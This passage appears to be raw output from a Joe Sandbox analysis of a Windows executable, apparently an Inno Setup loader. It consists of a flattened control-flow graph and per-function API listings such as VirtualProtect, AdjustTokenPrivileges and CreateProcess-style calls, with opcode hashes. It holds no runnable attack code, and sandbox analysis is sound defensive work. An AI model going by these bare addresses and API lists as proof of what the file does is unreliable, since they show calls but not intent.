403120 LocalAlloc 4954->4955 4956 403116 4954->4956 4957 40313e TlsSetValue 4955->4957 4958 403132 4955->4958 4956->4955 4957->4958 4958->4952 5031 40590c 4959->5031 4962 40524c GetSystemDefaultLCID 4964 405282 4962->4964 4963 404ca8 19 API calls 4963->4964 4964->4963 4965 4051d8 19 API calls 4964->4965 4966 4031e8 18 API calls 4964->4966 4969 4052e4 4964->4969 4965->4964 4966->4964 4967 404ca8 19 API calls 4967->4969 4968 4051d8 19 API calls 4968->4969 4969->4967 4969->4968 4970 4031e8 18 API calls 4969->4970 4971 405367 4969->4971 4970->4969 5050 4031b8 4971->5050 4974 405390 GetSystemDefaultLCID 5054 4051d8 GetLocaleInfoA 4974->5054 4977 4031e8 18 API calls 4978 4053d0 4977->4978 4979 4051d8 19 API calls 4978->4979 4980 4053e5 4979->4980 4981 4051d8 19 API calls 4980->4981 4982 405409 4981->4982 5060 405224 GetLocaleInfoA 4982->5060 4985 405224 GetLocaleInfoA 4986 405439 4985->4986 4987 4051d8 19 API calls 4986->4987 4988 405453 4987->4988 4989 405224 GetLocaleInfoA 4988->4989 4990 405470 4989->4990 4991 4051d8 19 API calls 4990->4991 4992 40548a 4991->4992 4993 4031e8 18 API calls 4992->4993 4994 405497 4993->4994 4995 4051d8 19 API calls 4994->4995 4996 4054ac 4995->4996 4997 4031e8 18 API calls 4996->4997 4998 4054b9 4997->4998 4999 405224 GetLocaleInfoA 4998->4999 5000 4054c7 4999->5000 5001 4051d8 19 API calls 5000->5001 5002 4054e1 5001->5002 5003 4031e8 18 API calls 5002->5003 5004 4054ee 5003->5004 5005 4051d8 19 API calls 5004->5005 5006 405503 5005->5006 5007 4031e8 18 API calls 5006->5007 5008 405510 5007->5008 5009 4051d8 19 API calls 5008->5009 5010 405525 5009->5010 5011 405542 5010->5011 5012 405533 5010->5012 5014 40322c 4 API calls 5011->5014 5068 40322c 5012->5068 5015 405540 5014->5015 5016 4051d8 19 API calls 5015->5016 5017 405564 5016->5017 5018 405581 5017->5018 5019 405572 5017->5019 5021 403198 4 API calls 5018->5021 5020 40322c 4 API calls 5019->5020 5022 40557f 5020->5022 5021->5022 5062 4033b4 5022->5062 5024 4055a3 5025 4033b4 18 API calls 5024->5025 5026 4055bd 5025->5026 5027 4031b8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5026->5027 5028 4055d7 5027->5028 5029 405cc0 GetVersionExA 5028->5029 5030 405cd7 5029->5030 5030->4838 5032 405918 5031->5032 5039 404ca8 LoadStringA 5032->5039 5035 4031e8 18 API calls 5036 405949 5035->5036 5042 403198 5036->5042 5040 403278 18 API calls 5039->5040 5041 404cd5 5040->5041 5041->5035 5043 4031b7 5042->5043 5044 40319e 5042->5044 5043->4962 5044->5043 5046 4025ac 5044->5046 5047 4025b0 5046->5047 5048 4025ba 5046->5048 5047->5048 5049 403154 4 API calls 5047->5049 5048->5043 5049->5048 5051 4031be 5050->5051 5052 4031e3 5051->5052 5053 4025ac 4 API calls 5051->5053 5052->4974 5053->5051 5055 405211 5054->5055 5056 4051ff 5054->5056 5058 40322c 4 API calls 5055->5058 5057 403278 18 API calls 5056->5057 5059 40520f 5057->5059 5058->5059 5059->4977 5061 405240 5060->5061 5061->4985 5063 4033bc 5062->5063 5072 403254 5063->5072 5065 4033cf 5066 4031e8 18 API calls 5065->5066 5067 4033f7 5066->5067 5070 403230 5068->5070 5069 403252 5069->5015 5070->5069 5071 4025ac 4 API calls 5070->5071 5071->5069 5073 403274 5072->5073 5074 403258 5072->5074 5073->5065 5077 402594 5074->5077 5076 403261 5076->5065 5078 402598 5077->5078 5080 4025a2 5077->5080 5083 401fd4 5078->5083 5079 40259e 5079->5080 5081 403154 4 API calls 5079->5081 5080->5076 5080->5080 5081->5080 5084 401fe8 5083->5084 5085 401fed 5083->5085 5094 401918 RtlInitializeCriticalSection 5084->5094 5087 402012 RtlEnterCriticalSection 5085->5087 5088 40201c 5085->5088 5093 401ff1 5085->5093 5087->5088 5088->5093 5101 401ee0 5088->5101 5091 402147 5091->5079 5092 40213d RtlLeaveCriticalSection 5092->5091 5093->5079 5095 40193c RtlEnterCriticalSection 5094->5095 5096 401946 5094->5096 5095->5096 5097 401964 LocalAlloc 5096->5097 5098 40197e 5097->5098 5099 4019c3 RtlLeaveCriticalSection 5098->5099 5100 4019cd 5098->5100 5099->5100 5100->5085 5104 401ef0 5101->5104 5102 401f1c 5106 401f40 5102->5106 5112 401d00 5102->5112 5104->5102 5104->5106 5107 401e58 5104->5107 5106->5091 5106->5092 5116 4016d8 5107->5116 5109 401e68 5110 401e75 5109->5110 5125 401dcc 5109->5125 5110->5104 5113 401d1e 5112->5113 5114 401d4e 5112->5114 5113->5106 5114->5113 5161 401c68 5114->5161 5119 4016f4 5116->5119 5118 4016fe 5132 4015c4 5118->5132 5119->5118 5122 40174f 5119->5122 5124 40170a 5119->5124 5136 401430 5119->5136 5144 40132c 5119->5144 5148 40150c 5122->5148 5124->5109 5152 401d80 5125->5152 5128 40132c LocalAlloc 5129 401df0 5128->5129 5131 401df8 5129->5131 5156 401b44 5129->5156 5131->5110 5134 40160a 5132->5134 5133 40163a 5133->5124 5134->5133 5135 401626 VirtualAlloc 5134->5135 5135->5133 5135->5134 5137 40143f VirtualAlloc 5136->5137 5139 40146c 5137->5139 5140 40148f 5137->5140 5141 4012e4 LocalAlloc 5139->5141 5140->5119 5142 401478 5141->5142 5142->5140 5143 40147c VirtualFree 5142->5143 5143->5140 5145 401348 5144->5145 5146 4012e4 LocalAlloc 5145->5146 5147 40138f 5146->5147 5147->5119 5151 40153b 5148->5151 5149 401594 5149->5124 5150 401568 VirtualFree 5150->5151 5151->5149 5151->5150 5153 401d89 5152->5153 5155 401d92 5152->5155 5154 401b74 9 API calls 5153->5154 5153->5155 5154->5155 5155->5128 5157 401b52 5156->5157 5159 401b61 5156->5159 5158 401d00 9 API calls 5157->5158 5160 401b5f 5158->5160 5159->5131 5160->5131 5162 401c7a 5161->5162 5163 401c9d 5162->5163 5164 401caf 5162->5164 5174 40188c 5163->5174 5166 40188c 3 API calls 5164->5166 5167 401cad 5166->5167 5168 401cc5 5167->5168 5169 401b44 9 API calls 5167->5169 5168->5113 5170 401cd4 5169->5170 5171 401cee 5170->5171 5184 401b98 5170->5184 5189 4013a0 5171->5189 5175 4018b2 5174->5175 5183 40190b 5174->5183 5176 401658 VirtualFree 5175->5176 5177 4018bf 5176->5177 5178 40132c LocalAlloc 5177->5178 5180 4018cf 5178->5180 5179 4018e6 5182 4013a0 LocalAlloc 5179->5182 5179->5183 5180->5179 5181 40150c VirtualFree 5180->5181 5181->5179 5182->5183 5183->5167 5185 401bab 5184->5185 5186 401b9d 5184->5186 5185->5171 5187 401b74 9 API calls 5186->5187 5188 401baa 5187->5188 5188->5171 5190 4013ab 5189->5190 5191 4013c6 5190->5191 5192 4012e4 LocalAlloc 5190->5192 5191->5168 5192->5191 5201 4034b8 5193->5201 5196 406e42 5197 4070d8 FormatMessageA 5196->5197 5198 4070fe 5197->5198 5199 403278 18 API calls 5198->5199 5200 40711b 5199->5200 5200->4845 5202 4034bc LoadLibraryA 5201->5202 5202->5196 5210 406908 GetCommandLineA 5203->5210 5205 406a4c 5207 406a6d 5205->5207 5212 406990 5205->5212 5208 4031b8 4 API calls 5207->5208 5209 406a87 5208->5209 5209->4859 5211 406915 5210->5211 5211->5205 5213 4069b2 5212->5213 5214 403278 18 API calls 5213->5214 5215 4069e6 5214->5215 5222 4034c4 5215->5222 5217 4069ee 5218 4031e8 18 API calls 5217->5218 5219 406a06 5218->5219 5220 403198 4 API calls 5219->5220 5221 406a1b 5220->5221 5221->5205 5223 4034ca 5222->5223 5225 4034db 5222->5225 5224 403254 18 API calls 5223->5224 5223->5225 5224->5225 5225->5217 5227 40723c 5226->5227 5228 40727b 6CAD5CA0 5227->5228 5228->4880 5230 4034b8 5229->5230 5231 40727b 6CAD5CA0 5230->5231 5231->4880 5235 4072f0 5232->5235 5236 4070d8 19 API calls 5235->5236 5237 407318 5236->5237 5238 407338 5237->5238 5244 405160 5237->5244 5247 40585c 5238->5247 5241 407347 5242 403198 4 API calls 5241->5242 5243 407364 5242->5243 5243->4882 5251 405174 5244->5251 5248 405863 5247->5248 5249 4031e8 18 API calls 5248->5249 5250 40587b 5249->5250 5250->5241 5252 405191 5251->5252 5259 404e24 5252->5259 5255 4051bd 5257 403278 18 API calls 5255->5257 5258 40516f 5257->5258 5258->5238 5262 404e3f 5259->5262 5260 404e51 5260->5255 5264 404bb0 5260->5264 5262->5260 5267 404f46 5262->5267 5274 404e18 5262->5274 5265 40590c 19 API calls 5264->5265 5266 404bc1 5265->5266 5266->5255 5268 404f57 5267->5268 5270 404fa5 5267->5270 5268->5270 5271 40502b 5268->5271 5273 404fc3 5270->5273 5277 404dc0 5270->5277 5271->5273 5281 404e04 5271->5281 5273->5262 5275 403198 4 API calls 5274->5275 5276 404e22 5275->5276 5276->5262 5278 404dce 5277->5278 5284 404bc8 5278->5284 5280 404dfc 5280->5270 5297 403a48 5281->5297 5287 40597c 5284->5287 5286 404be1 5286->5280 5288 40598a 5287->5288 5289 404ca8 19 API calls 5288->5289 5290 4059b4 5289->5290 5291 405160 33 API calls 5290->5291 5292 4059c2 5291->5292 5293 4031e8 18 API calls 5292->5293 5294 4059cd 5293->5294 5295 4031b8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5294->5295 5296 4059e7 5295->5296 5296->5286 5298 403a4f 5297->5298 5303 403958 5298->5303 5300 403a6f 5301 403198 4 API calls 5300->5301 5302 403a76 5301->5302 5302->5273 5304 403979 5303->5304 5305 40396c 5303->5305 5307 4039d8 5304->5307 5308 40397f 5304->5308 5306 403824 6 API calls 5305->5306 5311 403974 5306->5311 5309 403a37 5307->5309 5310 4039df 5307->5310 5312 403992 5308->5312 5313 403985 5308->5313 5314 403898 VariantClear VariantChangeTypeEx VariantChangeTypeEx 5309->5314 5315 4039e5 5310->5315 5316 4039ef 5310->5316 5311->5300 5318 403938 6 API calls 5312->5318 5317 403938 6 API calls 5313->5317 5314->5311 5319 403908 23 API calls 5315->5319 5320 403898 VariantClear VariantChangeTypeEx VariantChangeTypeEx 5316->5320 5317->5311 5321 4039a0 5318->5321 5319->5311 5322 403a01 5320->5322 5323 403898 VariantClear VariantChangeTypeEx VariantChangeTypeEx 5321->5323 5324 403908 23 API calls 5322->5324 5325 4039bb 5323->5325 5326 403a1a 5324->5326 5327 4037f0 VariantClear 5325->5327 5329 4037f0 VariantClear 5326->5329 5328 4039d0 5327->5328 5328->5300 5330 403a2f 5329->5330 5330->5300 5332 40741f 5331->5332 5333 40744b GetLastError 5331->5333 5332->4893 5333->5332 5334 407454 5333->5334 5335 407390 35 API calls 5334->5335 5335->5332 5337 4073c4 5336->5337 5338 4073db 5336->5338 5339 4073d4 5337->5339 5340 4073ca GetLastError 5337->5340 5338->4896 5338->4897 5341 407390 35 API calls 5339->5341 5340->5338 5340->5339 5341->5338 5343 4072bb 5342->5343 5344 4072ab GetLastError 5342->5344 5343->4916 5344->5343 5345 4072b4 5344->5345 5346 407390 35 API calls 5345->5346 5346->5343 5348 407a17 5347->5348 5349 407a0c 5347->5349 5370 4079a0 5348->5370 5355 407de0 5349->5355 5352 40585c 18 API calls 5353 407a15 5352->5353 5353->4924 5356 407e08 5355->5356 5358 407e0f 5355->5358 5374 407c20 5356->5374 5359 407e36 5358->5359 5360 407e2a 5358->5360 5361 407e2c 5358->5361 5362 407e6b 5359->5362 5364 407b34 33 API calls 5359->5364 5366 405160 33 API calls 5360->5366 5396 407b34 5361->5396 5365 403198 4 API calls 5362->5365 5364->5362 5367 407e80 5365->5367 5368 407e52 5366->5368 5367->5353 5399 407abc 5368->5399 5371 4079f3 5370->5371 5372 4079b4 5370->5372 5371->5352 5371->5353 5372->5371 5446 4078f0 5372->5446 5375 407c4c 5374->5375 5376 407c59 5375->5376 5377 407b34 33 API calls 5375->5377 5378 407c76 5376->5378 5379 407b34 33 API calls 5376->5379 5377->5376 5380 407c8f 5378->5380 5381 407b34 33 API calls 5378->5381 5379->5378 5382 407b34 33 API calls 5380->5382 5383 407c9f 5380->5383 5381->5380 5382->5383 5386 407d1c 5383->5386 5408 407bc4 5383->5408 5387 407d6e 5386->5387 5388 407d62 5386->5388 5389 407d64 5386->5389 5391 403198 4 API calls 5387->5391 5392 405160 33 API calls 5388->5392 5390 407b34 33 API calls 5389->5390 5390->5387 5393 407dad 5391->5393 5394 407d8a 5392->5394 5393->5358 5395 407abc 18 API calls 5394->5395 5395->5387 5411 405890 5396->5411 5398 407b56 5398->5359 5400 40322c 4 API calls 5399->5400 5401 407ae1 5400->5401 5419 4032fc 5401->5419 5403 407aeb 5404 40585c 18 API calls 5403->5404 5405 407afa 5404->5405 5406 403198 4 API calls 5405->5406 5407 407b14 5406->5407 5407->5359 5409 407bd8 VirtualFree 5408->5409 5410 407bea VirtualAlloc 5408->5410 5409->5410 5410->5386 5412 40589c 5411->5412 5413 405160 33 API calls 5412->5413 5414 4058c9 5413->5414 5415 4031e8 18 API calls 5414->5415 5416 4058d4 5415->5416 5417 403198 4 API calls 5416->5417 5418 4058e9 5417->5418 5418->5398 5420 403300 5419->5420 5421 40333f 5419->5421 5422 4031e8 5420->5422 5423 40330a 5420->5423 5421->5403 5426 4031fc 5422->5426 5430 403254 18 API calls 5422->5430 5424 403334 5423->5424 5425 40331d 5423->5425 5429 403594 18 API calls 5424->5429 5433 403594 5425->5433 5428 403228 5426->5428 5432 4025ac 4 API calls 5426->5432 5428->5403 5431 403322 5429->5431 5430->5426 5431->5403 5432->5428 5434 4035a1 5433->5434 5441 4035d1 5433->5441 5436 4035ca 5434->5436 5438 4035ad 5434->5438 5435 403198 4 API calls 5437 4035bb 5435->5437 5439 403254 18 API calls 5436->5439 5437->5431 5442 4025c4 5438->5442 5439->5441 5441->5435 5443 4025ca 5442->5443 5444 4025dc 5443->5444 5445 403154 4 API calls 5443->5445 5444->5437 5444->5444 5445->5444 5447 40790c 5446->5447 5448 4078fb 5446->5448 5449 4073e4 37 API calls 5447->5449 5450 40585c 18 API calls 5448->5450 5451 407920 5449->5451 5450->5447 5452 4073e4 37 API calls 5451->5452 5453 407941 5452->5453 5454 4076d0 InterlockedExchange 5453->5454 5455 407956 5454->5455 5456 40585c 18 API calls 5455->5456 5457 40796c 5455->5457 5456->5457 5457->5372 5459 40768e 5458->5459 5460 40769f 5458->5460 5461 407693 InterlockedExchange 5459->5461 5460->4804 5461->5460 6339 4078a0 6340 4078b1 6339->6340 6341 4078d5 6340->6341 6342 407288 37 API calls 6340->6342 6343 4078c1 6342->6343 6344 407424 37 API calls 6343->6344 6344->6341 6345 405aa0 6346 405aa8 6345->6346 6348 405ab0 6345->6348 6347 405ab7 6346->6347 6349 405aae 6346->6349 6350 40590c 19 API calls 6347->6350 6352 405a18 6349->6352 6350->6348 6353 405a20 6352->6353 6354 405a3a 6353->6354 6355 403154 4 API calls 6353->6355 6356 405a56 6354->6356 6357 405a3f 6354->6357 6355->6353 6359 403154 4 API calls 6356->6359 6358 40590c 19 API calls 6357->6358 6360 405a52 6358->6360 6361 405a5b 6359->6361 6363 403154 4 API calls 6360->6363 6362 40597c 33 API calls 6361->6362 6362->6360 6364 405a84 6363->6364 6365 403154 4 API calls 6364->6365 6366 405a92 6365->6366 6366->6348 6093 404021 6094 404046 6093->6094 6097 404028 6093->6097 6096 403f32 4 API calls 6094->6096 6094->6097 6095 404030 6096->6097 6097->6095 6098 402674 4 API calls 6097->6098 6099 40406e 6098->6099 6367 409ea3 6368 409eac 6367->6368 6370 409eb1 6367->6370 6375 40910c 6368->6375 6371 403198 4 API calls 6370->6371 6372 409efc 6371->6372 6373 403198 4 API calls 6372->6373 6374 409f04 6373->6374 6376 409118 GetCurrentProcess OpenProcessToken 6375->6376 6377 409179 6CF44E70 6375->6377 6378 409131 LookupPrivilegeValueA AdjustTokenPrivileges GetLastError 6376->6378 6379 40912a 6376->6379 6380 409186 6377->6380 6381 40912f 6377->6381 6378->6377 6384 409172 6378->6384 6386 4090ec 6379->6386 6382 4090ec MessageBoxA 6380->6382 6381->6370 6382->6381 6385 4090ec MessageBoxA 6384->6385 6385->6381 6387 4090f8 6386->6387 6388 409103 MessageBoxA 6387->6388 6388->6381 6478 403b24 CloseHandle 6479 403b34 6478->6479 6480 403b35 GetLastError 6478->6480 5801 403da6 5802 403db6 5801->5802 5803 403e83 ExitProcess 5802->5803 5804 403e5c 5802->5804 5807 403e8e 5802->5807 5811 403e33 MessageBoxA 5802->5811 5812 403e48 5802->5812 5817 403d6c 5804->5817 5808 403d6c 4 API calls 5809 403e70 5808->5809 5821 4019dc 5809->5821 5811->5804 5833 404088 5812->5833 5813 403e75 5813->5803 5813->5807 5818 403d7a 5817->5818 5819 403d8f 5818->5819 5837 402674 5818->5837 5819->5808 5822 401abb 5821->5822 5823 4019ed 5821->5823 5822->5813 5824 401a04 RtlEnterCriticalSection 5823->5824 5825 401a0e LocalFree 5823->5825 5824->5825 5826 401a41 5825->5826 5827 401a2f VirtualFree 5826->5827 5828 401a49 5826->5828 5827->5826 5829 401a70 LocalFree 5828->5829 5830 401a87 5828->5830 5829->5829 5829->5830 5831 401aa9 RtlDeleteCriticalSection 5830->5831 5832 401a9f RtlLeaveCriticalSection 5830->5832 5831->5813 5832->5831 5834 40408c 5833->5834 5840 403fab 5834->5840 5836 4040aa 5838 403154 4 API calls 5837->5838 5839 40267a 5838->5839 5839->5819 5843 403fad 5840->5843 5842 403fe0 5842->5836 5844 403154 4 API calls 5843->5844 5845 403f40 5843->5845 5849 403fe1 5843->5849 5863 403f40 5843->5863 5844->5843 5845->5842 5846 403f96 5845->5846 5851 403f4d 5845->5851 5854 403f32 5845->5854 5848 402674 4 API calls 5846->5848 5853 403f73 5848->5853 5849->5836 5852 402674 4 API calls 5851->5852 5851->5853 5852->5853 5853->5836 5855 403ef0 5854->5855 5856 403f0b 5855->5856 5857 403f06 5855->5857 5858 403f1f 5855->5858 5861 403f1c 5856->5861 5862 402674 4 API calls 5856->5862 5860 403d6c 4 API calls 5857->5860 5859 402674 4 API calls 5858->5859 5859->5861 5860->5856 5861->5846 5861->5851 5862->5861 5864 403f7b 5863->5864 5870 403f4d 5863->5870 5866 403f96 5864->5866 5867 403f32 4 API calls 5864->5867 5865 403f73 5865->5843 5868 402674 4 API calls 5866->5868 5869 403f8a 5867->5869 5868->5865 5869->5866 5869->5870 5870->5865 5871 402674 4 API calls 5870->5871 5871->5865 6481 404327 6482 404367 6481->6482 6483 403154 4 API calls 6482->6483 6484 4043c7 6483->6484 6485 409528 6486 409551 6485->6486 6487 40953e 6485->6487 6488 409546 CallWindowProcA 6487->6488 6489 409548 6487->6489 6488->6486 6489->6486 6491 409400 19 API calls 6489->6491 6491->6486 6104 404229 6105 4042a3 6104->6105 6106 403154 4 API calls 6105->6106 6107 404270 6105->6107 6108 4043c7 6106->6108 6389 402caa 6390 403154 4 API calls 6389->6390 6391 402caf 6390->6391 6392 4042aa 6393 404270 6392->6393 6396 4042ae 6392->6396 6394 403154 4 API calls 6397 4043c7 6394->6397 6395 404326 6396->6394 6396->6395 6611 4011aa 6612 4011ac GetStdHandle 6611->6612 6496 403f2b 6497 403ef0 6496->6497 6498 403f06 6497->6498 6499 403f1f 6497->6499 6500 403f0b 6497->6500 6502 403d6c 4 API calls 6498->6502 6501 402674 4 API calls 6499->6501 6503 403f1c 6500->6503 6504 402674 4 API calls 6500->6504 6501->6503 6502->6500 6504->6503 6398 4028ac 6399 402594 18 API calls 6398->6399 6400 4028b6 6399->6400 6505 40512c 6506 40513f 6505->6506 6507 404e24 33 API calls 6506->6507 6508 405153 6507->6508 6109 403a35 6110 403a27 6109->6110 6113 4037f0 6110->6113 6112 403a2f 6114 40380a 6113->6114 6115 4037fd 6113->6115 6114->6112 6115->6114 6116 40381d VariantClear 6115->6116 6116->6112 6411 401ab9 6412 401a96 6411->6412 6413 401aa9 RtlDeleteCriticalSection 6412->6413 6414 401a9f RtlLeaveCriticalSection 6412->6414 6414->6413 6524 403b3b 6525 403b50 6524->6525 6526 403c60 GetStdHandle 6525->6526 6527 403bb2 6CAD5CA0 6525->6527 6535 403b56 6525->6535 6529 403cbb GetLastError 6526->6529 6541 403c5e 6526->6541 6528 403bd0 6527->6528 6527->6529 6531 403bdf GetFileSize 6528->6531 6528->6541 6529->6535 6531->6529 6532 403bf2 SetFilePointer 6531->6532 6532->6529 6537 403c0e ReadFile 6532->6537 6533 403c8b GetFileType 6534 403ca6 CloseHandle 6533->6534 6533->6535 6534->6535 6537->6529 6538 403c30 6537->6538 6539 403c43 SetFilePointer 6538->6539 6538->6541 6539->6529 6540 403c54 SetEndOfFile 6539->6540 6540->6529 6540->6541 6541->6533 6541->6535

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 168 409764-409788 GetSystemInfo VirtualQuery 169 409818-40981f 168->169 170 40978e 168->170 171 40980d-409812 170->171 171->169 172 409790-409797 171->172 173 4097f9-40980b VirtualQuery 172->173 174 409799-40979d 172->174 173->169 173->171 174->173 175 40979f-4097a7 174->175 176 4097b8-4097c9 VirtualProtect 175->176 177 4097a9-4097ac 175->177 179 4097cb 176->179 180 4097cd-4097cf 176->180 177->176 178 4097ae-4097b1 177->178 178->176 181 4097b3-4097b6 178->181 179->180 182 4097de-4097e1 180->182 181->176 181->180 183 4097d1-4097da call 40975c 182->183 184 4097e3-4097e5 182->184 183->182 184->173 186 4097e7-4097f4 VirtualProtect 184->186 186->173
                                          APIs
                                          • GetSystemInfo.KERNEL32(?), ref: 00409776
                                          • VirtualQuery.KERNEL32(00400000,?,0000001C,?), ref: 00409781
                                          • VirtualProtect.KERNEL32(?,?,00000040,?,00400000,?,0000001C,?), ref: 004097C2
                                          • VirtualProtect.KERNEL32(?,?,?,?,?,?,00000040,?,00400000,?,0000001C,?), ref: 004097F4
                                          • VirtualQuery.KERNEL32(?,?,0000001C,00400000,?,0000001C,?), ref: 00409804
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.376442774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000001.00000002.376435251.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.376452921.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.376464043.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.376471174.0000000000417000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                          Similarity
                                          • API ID: Virtual$ProtectQuery$InfoSystem
                                          • String ID:
                                          • API String ID: 2441996862-0
                                          • Opcode ID: e7d59a0a1be65b1ec303da3268a7ff8597b9aef66cd3e2b8048c8a494adb3755
                                          • Instruction ID: 44c210a8e48c48985264e56f916c74eddf15e633ff85efca976292ba9331e058
                                          • Opcode Fuzzy Hash: e7d59a0a1be65b1ec303da3268a7ff8597b9aef66cd3e2b8048c8a494adb3755
                                          • Instruction Fuzzy Hash: 3F215E72210304ABD630AE598C85E9777DCDB45760F184D2EFA85F33C2D638EC448669
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040B4BC,00000001,?,004052A3,?,00000000,00405382), ref: 004051F6
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.376442774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000001.00000002.376435251.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.376452921.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.376464043.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.376471174.0000000000417000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                          Similarity
                                          • API ID: InfoLocale
                                          • String ID:
                                          • API String ID: 2299586839-0
                                          • Opcode ID: cf18c32ad4b4180bbf3070ecb9de66825d20615657b4f7ee4738737295393d70
                                          • Instruction ID: c488385247b8728ccff325faa9690c1689411ec08dfc6ccb0026e5f0f67dc910
                                          • Opcode Fuzzy Hash: cf18c32ad4b4180bbf3070ecb9de66825d20615657b4f7ee4738737295393d70
                                          • Instruction Fuzzy Hash: 62E0927171021427D710A9A99C86AEB725CDBA8310F0042BFBA04E73C1EDB49E804AED
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          APIs
                                          • 6CF47180.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,004096D0,02057D44,004096C4,00000000,004096AC), ref: 00409630
                                          • CloseHandle.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,004096D0,02057D44,004096C4,00000000), ref: 00409644
                                          • TranslateMessage.USER32(?), ref: 0040964C
                                          • DispatchMessageA.USER32 ref: 00409652
                                          • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00409660
                                          • MsgWaitForMultipleObjects.USER32 ref: 00409678
                                          • GetExitCodeProcess.KERNEL32 ref: 00409688
                                          • CloseHandle.KERNEL32(?,?,?,00000001,?,00000000,000000FF,000000FF,?,00000000,00000000,00000000,00000001,?,?,00000000), ref: 00409691
                                            • Part of subcall function 00409208: GetLastError.KERNEL32(00000000,004092AB,?,?,02057D44,?), ref: 0040922C
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.376442774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000001.00000002.376435251.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.376452921.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.376464043.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.376471174.0000000000417000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                          Similarity
                                          • API ID: Message$CloseHandle$CodeDispatchErrorExitF47180LastMultipleObjectsPeekProcessTranslateWait
                                          • String ID: D
                                          • API String ID: 13735194-2746444292
                                          • Opcode ID: f8baab0b16f95bcb41a92faca313044c58b1755c98dcb2aabc14506fbbade818
                                          • Instruction ID: d858c4e90e296b6a0f27a38bb6cee8d1b41b96b06899fb1c418bc379a6a5f87c
                                          • Opcode Fuzzy Hash: f8baab0b16f95bcb41a92faca313044c58b1755c98dcb2aabc14506fbbade818
                                          • Instruction Fuzzy Hash: 862183B0A402087ADB10EBE6CC42F9F7BAC9F48714F51443BB714F62C2DA7D99058A6D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          APIs
                                          • CreateWindowExA.USER32 ref: 00409D53
                                          • SetWindowLongA.USER32 ref: 00409D6A
                                            • Part of subcall function 00406908: GetCommandLineA.KERNEL32(0040BDE0,?,00406A4C,00000000,00406A88,?,?,0040BDE0,?,00000000,00000000,?,00409345,00000000,004093D1), ref: 0040690C
                                            • Part of subcall function 004095BC: 6CF47180.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,004096D0,02057D44,004096C4,00000000,004096AC), ref: 00409630
                                            • Part of subcall function 004095BC: CloseHandle.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,004096D0,02057D44,004096C4,00000000), ref: 00409644
                                            • Part of subcall function 004095BC: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00409660
                                            • Part of subcall function 004095BC: MsgWaitForMultipleObjects.USER32 ref: 00409678
                                            • Part of subcall function 004095BC: GetExitCodeProcess.KERNEL32 ref: 00409688
                                            • Part of subcall function 004095BC: CloseHandle.KERNEL32(?,?,?,00000001,?,00000000,000000FF,000000FF,?,00000000,00000000,00000000,00000001,?,?,00000000), ref: 00409691
                                          • RemoveDirectoryA.KERNEL32(00000000,00409EA3,000000FC,00409528,00000000,STATIC,InnoSetupLdrWindow,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 00409E50
                                          • 72E69840.USER32(000902D6,00409EA3,000000FC,00409528,00000000,STATIC,InnoSetupLdrWindow,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 00409E64
                                            • Part of subcall function 004091A4: Sleep.KERNEL32(?,?,?,?,0000000D,?,00409E3C,000000FA,00000032,00409EA3,000000FC,00409528,00000000,STATIC,InnoSetupLdrWindow,00000000), ref: 004091C3
                                            • Part of subcall function 004091A4: GetLastError.KERNEL32(?,?,?,0000000D,?,00409E3C,000000FA,00000032,00409EA3,000000FC,00409528,00000000,STATIC,InnoSetupLdrWindow,00000000,00000000), ref: 004091E6
                                            • Part of subcall function 004091A4: GetLastError.KERNEL32(?,?,?,0000000D,?,00409E3C,000000FA,00000032,00409EA3,000000FC,00409528,00000000,STATIC,InnoSetupLdrWindow,00000000,00000000), ref: 004091F0
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.376442774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000001.00000002.376435251.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
